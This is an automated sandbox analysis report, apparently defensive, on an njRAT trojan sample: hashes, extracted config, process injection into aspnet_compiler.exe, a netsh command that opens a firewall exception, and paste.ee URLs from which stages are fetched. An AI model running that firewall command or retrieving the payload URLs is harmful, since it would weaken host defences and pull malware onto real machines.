njrat | 50c4981ce9e9bf59c4618e173962dba774131dcbd0822ea2a7126ecf4856b194

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20231222-en
resource tags

arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
submitted
07/01/2024, 20:58 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

49bf33f0b08d37da284f8639c1f00055.exe
Size

40KB
MD5

49bf33f0b08d37da284f8639c1f00055
SHA1

3695046661213ba96b279bea83aabde19ec1a03f
SHA256

50c4981ce9e9bf59c4618e173962dba774131dcbd0822ea2a7126ecf4856b194
SHA512

53999c4ea4852bdfce596624b5fce5df1ede2435399cefb0845d23e3c84c1ad284e62e31abf0119efdb9d829fe03123d5eb16132eaa729731a98e5d86c1313db
SSDEEP

192:/TBBdaStRucohNosFOX0GPGJnelDwyX9rUX:/TjMFhNosYHGJUDwyXRUX

Score

10^/10

njrat jaja evasion trojan

Malware Config

Extracted

Family

njrat

Version

0.7d

Botnet

jaja

127.0.0.1:442

Mutex

74caf6ac20895d0081b0f902a5e18339

Attributes

reg_key
74caf6ac20895d0081b0f902a5e18339
splitter
|'|'|

Signatures

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Windows Service

T1543.003

pid	Process
4080	netsh.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4656 set thread context of 2568	4656	49bf33f0b08d37da284f8639c1f00055.exe	91

Suspicious use of AdjustPrivilegeToken 35 IoCs

description	pid	Process
Token: SeDebugPrivilege	2568	aspnet_compiler.exe
Token: 33	2568	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	2568	aspnet_compiler.exe
Token: 33	2568	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	2568	aspnet_compiler.exe
Token: 33	2568	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	2568	aspnet_compiler.exe
Token: 33	2568	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	2568	aspnet_compiler.exe
Token: 33	2568	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	2568	aspnet_compiler.exe
Token: 33	2568	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	2568	aspnet_compiler.exe
Token: 33	2568	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	2568	aspnet_compiler.exe
Token: 33	2568	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	2568	aspnet_compiler.exe
Token: 33	2568	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	2568	aspnet_compiler.exe
Token: 33	2568	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	2568	aspnet_compiler.exe
Token: 33	2568	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	2568	aspnet_compiler.exe
Token: 33	2568	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	2568	aspnet_compiler.exe
Token: 33	2568	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	2568	aspnet_compiler.exe
Token: 33	2568	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	2568	aspnet_compiler.exe
Token: 33	2568	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	2568	aspnet_compiler.exe
Token: 33	2568	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	2568	aspnet_compiler.exe
Token: 33	2568	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	2568	aspnet_compiler.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4656	49bf33f0b08d37da284f8639c1f00055.exe

Suspicious use of WriteProcessMemory 11 IoCs

description	pid	Process	procid_target
PID 4656 wrote to memory of 2568	4656	49bf33f0b08d37da284f8639c1f00055.exe	91
PID 4656 wrote to memory of 2568	4656	49bf33f0b08d37da284f8639c1f00055.exe	91
PID 4656 wrote to memory of 2568	4656	49bf33f0b08d37da284f8639c1f00055.exe	91
PID 4656 wrote to memory of 2568	4656	49bf33f0b08d37da284f8639c1f00055.exe	91
PID 4656 wrote to memory of 2568	4656	49bf33f0b08d37da284f8639c1f00055.exe	91
PID 4656 wrote to memory of 2568	4656	49bf33f0b08d37da284f8639c1f00055.exe	91
PID 4656 wrote to memory of 2568	4656	49bf33f0b08d37da284f8639c1f00055.exe	91
PID 4656 wrote to memory of 2568	4656	49bf33f0b08d37da284f8639c1f00055.exe	91
PID 2568 wrote to memory of 4080	2568	aspnet_compiler.exe	96
PID 2568 wrote to memory of 4080	2568	aspnet_compiler.exe	96
PID 2568 wrote to memory of 4080	2568	aspnet_compiler.exe	96

C:\Users\Admin\AppData\Local\Temp\49bf33f0b08d37da284f8639c1f00055.exe
"C:\Users\Admin\AppData\Local\Temp\49bf33f0b08d37da284f8639c1f00055.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4656
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
  "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2568
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe" "aspnet_compiler.exe" ENABLE
    3⤵
    - Modifies Windows Firewall
    PID:4080

Network

DNS

paste.ee

49bf33f0b08d37da284f8639c1f00055.exe

Remote address:

8.8.8.8:53

Request

paste.ee

IN A

Response

paste.ee

IN A

172.67.187.200

paste.ee

IN A

104.21.84.67
GET

https://paste.ee/r/esh7c

49bf33f0b08d37da284f8639c1f00055.exe

Remote address:

172.67.187.200:443

Request

GET /r/esh7c HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: paste.ee
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sun, 07 Jan 2024 20:58:07 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=2592000
strict-transport-security: max-age=63072000
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
CF-Cache-Status: MISS
Last-Modified: Sun, 07 Jan 2024 20:58:07 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=w01gDSt5F7gPqjacyrr5E%2BSlrbiGu2NEkaNWicGhb%2BuZjFa0RNssbxLsM%2Fn4OkhLtGs5IFGDWqVkMwXARzmJXPGazOj%2B808dhHBodmIb%2Bd0uBZkJpwvLXrwyeA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 841f1df408014134-LHR
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
GET

https://paste.ee/r/qpFrB

49bf33f0b08d37da284f8639c1f00055.exe

Remote address:

172.67.187.200:443

Request

GET /r/qpFrB HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: paste.ee
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sun, 07 Jan 2024 20:58:08 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=2592000
strict-transport-security: max-age=63072000
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
CF-Cache-Status: MISS
Last-Modified: Sun, 07 Jan 2024 20:58:08 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NROpdgoKhrjaQtxq1qusxrY%2FqAc%2BaPPc%2Bbo%2BuEAKVAHDRR0HRD7KsSjGAdB%2Fdgvh1oOGo281GAJPKWE9sH5Xc79og1NJZUx3Y1Ux7s346FkVrNY0ysy9T2OvOw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 841f1dfad9ab4134-LHR
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
DNS

g.bing.com

Remote address:

8.8.8.8:53

Request

g.bing.com

IN A

Response

g.bing.com

IN CNAME

g-bing-com.a-0001.a-msedge.net

g-bing-com.a-0001.a-msedge.net

IN CNAME

dual-a-0001.a-msedge.net

dual-a-0001.a-msedge.net

IN A

204.79.197.200

dual-a-0001.a-msedge.net

IN A

13.107.21.200
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=65b307ab243b4c6ea5c4747b72b77014&localId=w:F83E3474-2937-F57B-08FA-577E7DA14C95&deviceId=6896190588109571&anid=

Remote address:

204.79.197.200:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=65b307ab243b4c6ea5c4747b72b77014&localId=w:F83E3474-2937-F57B-08FA-577E7DA14C95&deviceId=6896190588109571&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=3FA3F490494C6B4B0AD4E76F48AC6A1A; domain=.bing.com; expires=Fri, 31-Jan-2025 20:58:10 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: C8EC13D738954AE781E2B6418DDC29B0 Ref B: LON04EDGE1016 Ref C: 2024-01-07T20:58:10Z
date: Sun, 07 Jan 2024 20:58:09 GMT
GET

https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=65b307ab243b4c6ea5c4747b72b77014&localId=w:F83E3474-2937-F57B-08FA-577E7DA14C95&deviceId=6896190588109571&anid=

Remote address:

204.79.197.200:443

Request

GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=65b307ab243b4c6ea5c4747b72b77014&localId=w:F83E3474-2937-F57B-08FA-577E7DA14C95&deviceId=6896190588109571&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=3FA3F490494C6B4B0AD4E76F48AC6A1A

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=1jfaBhxJS9xpv-MQ827DdZxIc87rhMMzHDn3X4oGrVA; domain=.bing.com; expires=Fri, 31-Jan-2025 20:58:10 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: E46A7BEF7AAB42B1932C6FF301E6F8EB Ref B: LON04EDGE1016 Ref C: 2024-01-07T20:58:10Z
date: Sun, 07 Jan 2024 20:58:09 GMT
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=65b307ab243b4c6ea5c4747b72b77014&localId=w:F83E3474-2937-F57B-08FA-577E7DA14C95&deviceId=6896190588109571&anid=

Remote address:

204.79.197.200:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=65b307ab243b4c6ea5c4747b72b77014&localId=w:F83E3474-2937-F57B-08FA-577E7DA14C95&deviceId=6896190588109571&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=3FA3F490494C6B4B0AD4E76F48AC6A1A; MSPTC=1jfaBhxJS9xpv-MQ827DdZxIc87rhMMzHDn3X4oGrVA

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: BFD61EB3659148AAB4C49372C3FE694E Ref B: LON04EDGE1016 Ref C: 2024-01-07T20:58:10Z
date: Sun, 07 Jan 2024 20:58:09 GMT
DNS

200.187.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

200.187.67.172.in-addr.arpa

IN PTR

Response
DNS

200.187.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

200.187.67.172.in-addr.arpa

IN PTR
DNS

200.187.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

200.187.67.172.in-addr.arpa

IN PTR
DNS

155.179.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

155.179.17.96.in-addr.arpa

IN PTR

Response

155.179.17.96.in-addr.arpa

IN PTR

a96-17-179-155deploystaticakamaitechnologiescom
DNS

155.179.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

155.179.17.96.in-addr.arpa

IN PTR
DNS

158.240.127.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

158.240.127.40.in-addr.arpa

IN PTR

Response
DNS

6.181.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

6.181.190.20.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

26.35.223.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

26.35.223.20.in-addr.arpa

IN PTR

Response
DNS

146.78.124.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

146.78.124.51.in-addr.arpa

IN PTR

Response
DNS

103.169.127.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

103.169.127.40.in-addr.arpa

IN PTR

Response
DNS

9.228.82.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

9.228.82.20.in-addr.arpa

IN PTR

Response
DNS

9.228.82.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

9.228.82.20.in-addr.arpa

IN PTR
DNS

2.136.104.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

2.136.104.51.in-addr.arpa

IN PTR

Response
DNS

167.109.18.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

167.109.18.2.in-addr.arpa

IN PTR

Response

167.109.18.2.in-addr.arpa

IN PTR

a2-18-109-167deploystaticakamaitechnologiescom
DNS

18.31.95.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

18.31.95.13.in-addr.arpa

IN PTR

Response
DNS

134.71.91.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

134.71.91.104.in-addr.arpa

IN PTR

Response

134.71.91.104.in-addr.arpa

IN PTR

a104-91-71-134deploystaticakamaitechnologiescom
DNS

134.71.91.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

134.71.91.104.in-addr.arpa

IN PTR
DNS

134.71.91.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

134.71.91.104.in-addr.arpa

IN PTR
DNS

134.71.91.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

134.71.91.104.in-addr.arpa

IN PTR
DNS

206.23.85.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.23.85.13.in-addr.arpa

IN PTR

Response
DNS

160.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

160.178.17.96.in-addr.arpa

IN PTR

Response

160.178.17.96.in-addr.arpa

IN PTR

a96-17-178-160deploystaticakamaitechnologiescom
DNS

183.1.37.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

183.1.37.23.in-addr.arpa

IN PTR

Response

183.1.37.23.in-addr.arpa

IN PTR

a23-37-1-183deploystaticakamaitechnologiescom
DNS

205.47.74.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

205.47.74.20.in-addr.arpa

IN PTR

Response
DNS

119.110.54.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

119.110.54.20.in-addr.arpa

IN PTR

Response
DNS

166.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

166.178.17.96.in-addr.arpa

IN PTR

Response

166.178.17.96.in-addr.arpa

IN PTR

a96-17-178-166deploystaticakamaitechnologiescom
DNS

166.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

166.178.17.96.in-addr.arpa

IN PTR
DNS

166.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

166.178.17.96.in-addr.arpa

IN PTR
DNS

171.179.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

171.179.17.96.in-addr.arpa

IN PTR

Response

171.179.17.96.in-addr.arpa

IN PTR

a96-17-179-171deploystaticakamaitechnologiescom
DNS

171.179.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

171.179.17.96.in-addr.arpa

IN PTR
DNS

171.179.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

171.179.17.96.in-addr.arpa

IN PTR
DNS

48.229.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

48.229.111.52.in-addr.arpa

IN PTR

Response
DNS

146.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

146.178.17.96.in-addr.arpa

IN PTR

Response

146.178.17.96.in-addr.arpa

IN PTR

a96-17-178-146deploystaticakamaitechnologiescom
DNS

tse1.mm.bing.net

Remote address:

8.8.8.8:53

Request

tse1.mm.bing.net

IN A

Response

tse1.mm.bing.net

IN CNAME

mm-mm.bing.net.trafficmanager.net

mm-mm.bing.net.trafficmanager.net

IN CNAME

dual-a-0001.a-msedge.net

dual-a-0001.a-msedge.net

IN A

204.79.197.200

dual-a-0001.a-msedge.net

IN A

13.107.21.200
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301236_1F0R8LNJXXE73BCIY&pid=21.2&w=1920&h=1080&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301236_1F0R8LNJXXE73BCIY&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 394186
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 6C9AB52C5DBC4FE6BA0497317418520C Ref B: LON04EDGE0720 Ref C: 2024-01-07T20:59:53Z
date: Sun, 07 Jan 2024 20:59:52 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301362_1O9HVN7VX0LX9G6S2&pid=21.2&w=1080&h=1920&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301362_1O9HVN7VX0LX9G6S2&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 527482
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 3BCB209C3FB14D52942C61B5BE3BE6FF Ref B: LON04EDGE0720 Ref C: 2024-01-07T20:59:54Z
date: Sun, 07 Jan 2024 20:59:53 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301453_1HOUYPI9NYZFL407Y&pid=21.2&w=1080&h=1920&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301453_1HOUYPI9NYZFL407Y&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 305935
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 3BFB2C897CC54B27BE1850363CF14B4C Ref B: LON04EDGE0720 Ref C: 2024-01-07T20:59:54Z
date: Sun, 07 Jan 2024 20:59:53 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317300929_14U14WCS4159DH3B0&pid=21.2&w=1920&h=1080&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317300929_14U14WCS4159DH3B0&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 174745
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 8D69E44BFEE64A6CA15F47772CAD7234 Ref B: LON04EDGE0720 Ref C: 2024-01-07T20:59:54Z
date: Sun, 07 Jan 2024 20:59:53 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301645_1DQ842AA5KWZY6AM7&pid=21.2&w=1080&h=1920&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301645_1DQ842AA5KWZY6AM7&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 517132
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 695C31476FDE445391E1AA914163191D Ref B: LON04EDGE0720 Ref C: 2024-01-07T20:59:54Z
date: Sun, 07 Jan 2024 20:59:53 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301020_14A3TVXX0O1AF1LY0&pid=21.2&w=1920&h=1080&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301020_14A3TVXX0O1AF1LY0&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 233452
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: B773FDD4F14E41058FCA8D76988F0553 Ref B: LON04EDGE0720 Ref C: 2024-01-07T20:59:55Z
date: Sun, 07 Jan 2024 20:59:54 GMT
DNS

140.71.91.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

140.71.91.104.in-addr.arpa

IN PTR

Response

140.71.91.104.in-addr.arpa

IN PTR

a104-91-71-140deploystaticakamaitechnologiescom
DNS

37.179.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

37.179.17.96.in-addr.arpa

IN PTR

Response

37.179.17.96.in-addr.arpa

IN PTR

a96-17-179-37deploystaticakamaitechnologiescom
DNS

37.179.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

37.179.17.96.in-addr.arpa

IN PTR
DNS

198.187.3.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

198.187.3.20.in-addr.arpa

IN PTR

Response
DNS

198.187.3.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

198.187.3.20.in-addr.arpa

IN PTR
DNS

198.187.3.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

198.187.3.20.in-addr.arpa

IN PTR
DNS

0.205.248.87.in-addr.arpa

Remote address:

8.8.8.8:53

Request

0.205.248.87.in-addr.arpa

IN PTR

Response

0.205.248.87.in-addr.arpa

IN PTR

https-87-248-205-0lgwllnwnet
DNS
